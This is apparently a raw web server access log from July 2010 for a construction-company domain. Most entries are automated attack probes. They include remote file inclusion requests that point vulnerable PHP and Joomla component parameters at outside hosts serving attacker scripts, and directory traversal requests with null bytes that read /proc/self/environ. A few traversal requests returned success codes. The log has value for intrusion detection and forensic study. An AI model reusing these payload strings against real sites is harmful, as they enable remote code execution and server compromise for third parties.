110.45.140.231 - - [01/Jul/2010:09:10:45 -0700] "GET /logs/access_100601.log/modifyform.html?code=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
202.45.154.38 - - [01/Jul/2010:09:15:03 -0700] "GET /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
202.45.154.38 - - [01/Jul/2010:09:15:20 -0700] "GET /logs/access_100601.log/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
202.45.154.38 - - [01/Jul/2010:09:15:20 -0700] "GET /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
202.45.154.38 - - [01/Jul/2010:09:15:21 -0700] "GET /logs/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
69.70.153.210 - - [01/Jul/2010:09:15:54 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.de-construction.com"
69.70.153.210 - - [01/Jul/2010:09:15:58 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.de-construction.com"
69.70.153.210 - - [01/Jul/2010:09:16:24 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.de-construction.com"
174.136.55.175 - - [01/Jul/2010:09:16:49 -0700] "GET /logs/access_100601.log/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.de-construction.com"
174.136.55.175 - - [01/Jul/2010:09:16:49 -0700] "GET /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.de-construction.com"
174.136.55.175 - - [01/Jul/2010:09:16:49 -0700] "GET /logs/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.de-construction.com"
81.208.34.38 - - [01/Jul/2010:09:19:20 -0700] "GET /logs/access_100531.log//?_PHPLIB[libdir]=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.70.153.210 - - [01/Jul/2010:09:23:15 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.de-construction.com"
61.135.134.108 - - [01/Jul/2010:09:24:20 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.135.134.108 - - [01/Jul/2010:09:24:20 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
61.135.134.108 - - [01/Jul/2010:09:24:21 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
79.244.105.120 - - [01/Jul/2010:09:27:27 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/sc1?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
79.244.105.120 - - [01/Jul/2010:09:27:27 -0700] "GET /logs/access_100601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/sc1?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
79.244.105.120 - - [01/Jul/2010:09:27:27 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/sc1?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
219.117.255.170 - - [01/Jul/2010:09:27:46 -0700] "GET /logs/access_100501.log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classhttp://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
219.117.255.170 - - [01/Jul/2010:09:27:47 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classhttp://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
219.117.255.170 - - [01/Jul/2010:09:27:47 -0700] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classhttp://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:09:28:08 -0700] "GET /components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:09:28:08 -0700] "GET /logs/access.log//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:09:28:08 -0700] "GET /logs//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:09:29:57 -0700] "GET /logs/access.log//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:09:29:57 -0700] "GET /logs//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:09:29:58 -0700] "GET /components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.70.153.210 - - [01/Jul/2010:09:30:36 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.everyedge.com/components/1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.70.153.210 - - [01/Jul/2010:09:30:36 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.everyedge.com/components/1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.70.153.210 - - [01/Jul/2010:09:30:41 -0700] "GET /logs/access_100601.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.everyedge.com/components/1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
211.63.60.50 - - [01/Jul/2010:09:35:53 -0700] "GET /logs/access_100531.log//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
207.46.199.184 - - [01/Jul/2010:09:40:41 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:09:43:14 -0700] "GET /logs/access_100601.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:09:43:14 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:09:43:14 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
219.117.255.170 - - [01/Jul/2010:09:43:32 -0700] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classhttp://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
219.117.255.170 - - [01/Jul/2010:09:43:33 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classhttp://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:09:43:36 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:09:43:37 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:09:43:37 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
219.117.255.170 - - [01/Jul/2010:09:43:47 -0700] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classhttp://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
219.117.255.170 - - [01/Jul/2010:09:43:47 -0700] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classhttp://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
219.117.255.170 - - [01/Jul/2010:09:43:48 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classhttp://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
219.117.255.170 - - [01/Jul/2010:09:43:48 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classhttp://nekoserver.com/blog//nucleus/images/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
69.70.153.210 - - [01/Jul/2010:09:47:21 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.everyedge.com/components/1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
110.45.140.231 - - [01/Jul/2010:09:51:36 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
110.45.140.231 - - [01/Jul/2010:09:51:37 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
110.45.140.231 - - [01/Jul/2010:09:51:37 -0700] "GET /logs/access.log/convert/mvcw.php?step=1&vwar_root=http://wkmg.co.kr/bbs/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.70.153.210 - - [01/Jul/2010:09:52:26 -0700] "GET /logs/access_100601.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.everyedge.com/components/1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
210.118.171.93 - - [01/Jul/2010:10:09:57 -0700] "GET /logs/access_100601.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rokmc541.co.kr/rok/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
210.118.171.93 - - [01/Jul/2010:10:09:57 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rokmc541.co.kr/rok/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
210.118.171.93 - - [01/Jul/2010:10:09:57 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rokmc541.co.kr/rok/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
210.118.171.93 - - [01/Jul/2010:10:12:05 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rokmc541.co.kr/rok/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
210.118.171.93 - - [01/Jul/2010:10:12:05 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rokmc541.co.kr/rok/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
210.118.171.93 - - [01/Jul/2010:10:12:05 -0700] "GET /logs/access_100601.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rokmc541.co.kr/rok/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
210.118.171.93 - - [01/Jul/2010:10:17:57 -0700] "GET /logs/access.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rokmc541.co.kr/rok/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
210.118.171.93 - - [01/Jul/2010:10:17:58 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rokmc541.co.kr/rok/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
210.118.171.93 - - [01/Jul/2010:10:17:59 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rokmc541.co.kr/rok/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
210.118.171.93 - - [01/Jul/2010:10:18:47 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rokmc541.co.kr/rok/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
210.118.171.93 - - [01/Jul/2010:10:18:47 -0700] "GET /logs/access.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rokmc541.co.kr/rok/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
210.118.171.93 - - [01/Jul/2010:10:18:48 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rokmc541.co.kr/rok/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
95.108.247.251 - - [01/Jul/2010:10:21:30 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:10:25:57 -0700] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:10:25:57 -0700] "GET /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
83.16.100.218 - - [01/Jul/2010:10:25:57 -0700] "GET /logs/access_100531.log//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:10:40:42 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1367 "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:10:40:42 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:10:45:38 -0700] "GET /logs/access_100601.log/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:10:45:38 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:10:45:38 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1367 "-" "libwww-perl/5.831" "www.de-construction.com"
85.17.199.105 - - [01/Jul/2010:10:46:25 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.de-construction.com"
85.88.3.65 - - [01/Jul/2010:11:10:35 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.88.3.65 - - [01/Jul/2010:11:10:35 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.88.3.65 - - [01/Jul/2010:11:10:40 -0700] "GET /logs/access_100601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
174.121.9.99 - - [01/Jul/2010:11:11:57 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
174.121.9.99 - - [01/Jul/2010:11:12:05 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
174.121.9.99 - - [01/Jul/2010:11:12:09 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
174.121.9.99 - - [01/Jul/2010:11:12:10 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.de-construction.com"
81.93.240.134 - - [01/Jul/2010:11:15:27 -0700] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
81.93.240.134 - - [01/Jul/2010:11:15:27 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.de-construction.com"
69.70.153.210 - - [01/Jul/2010:11:21:47 -0700] "GET /inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.everyedge.com/components/1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.70.153.210 - - [01/Jul/2010:11:21:47 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.everyedge.com/components/1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
69.70.153.210 - - [01/Jul/2010:11:21:49 -0700] "GET /logs/access.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.everyedge.com/components/1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
203.120.246.20 - - [01/Jul/2010:11:22:35 -0700] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.de-construction.com"
203.120.246.20 - - [01/Jul/2010:11:22:35 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.de-construction.com"
85.88.3.65 - - [01/Jul/2010:11:25:32 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.88.3.65 - - [01/Jul/2010:11:25:38 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
85.88.3.65 - - [01/Jul/2010:11:25:38 -0700] "GET /logs/access_100601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://royalbio.net/docs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
67.195.111.182 - - [01/Jul/2010:11:28:43 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.de-construction.com"
221.144.12.141 - - [01/Jul/2010:11:38:21 -0700] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
219.240.36.36 - - [01/Jul/2010:11:40:25 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
81.208.34.38 - - [01/Jul/2010:11:42:01 -0700] "GET /logs/access_100601.log//?_PHPLIB[libdir]=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
219.240.36.36 - - [01/Jul/2010:11:54:34 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:12:00:41 -0700] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:12:03:59 -0700] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:12:03:59 -0700] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:12:04:21 -0700] "GET /logs/access_100601.log//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:12:04:21 -0700] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
89.152.109.1 - - [01/Jul/2010:12:04:21 -0700] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.de-construction.com"
221.144.12.141 - - [01/Jul/2010:12:09:00 -0700] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.de-construction.com"
219.240.36.36 - - [01/Jul/2010:12:10:45 -0700] "GET /index.php?option=com_linkr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
121.254.172.27 - - [01/Jul/2010:12:19:07 -0700] "GET /logs/errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
121.254.172.27 - - [01/Jul/2010:12:19:07 -0700] "GET /logs/access_100601.log%20%20/errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
121.254.172.27 - - [01/Jul/2010:12:19:07 -0700] "GET /errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
121.254.172.27 - - [01/Jul/2010:12:24:34 -0700] "GET /logs/access.log/errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
121.254.172.27 - - [01/Jul/2010:12:27:35 -0700] "GET /logs/access_100531.log/errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:12:30:33 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:12:30:33 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
92.60.176.46 - - [01/Jul/2010:12:30:33 -0700] "GET /logs/access_100531.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://osungelec.co.kr/board//data/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.de-construction.com"
219.240.36.36 - - [01/Jul/2010:12:36:39 -0700] "GET /logs/access_100601.log//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
219.240.36.36 - - [01/Jul/2010:12:36:45 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
219.240.36.36 - - [01/Jul/2010:12:36:45 -0700] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
219.240.36.36 - - [01/Jul/2010:12:37:29 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.de-construction.com"
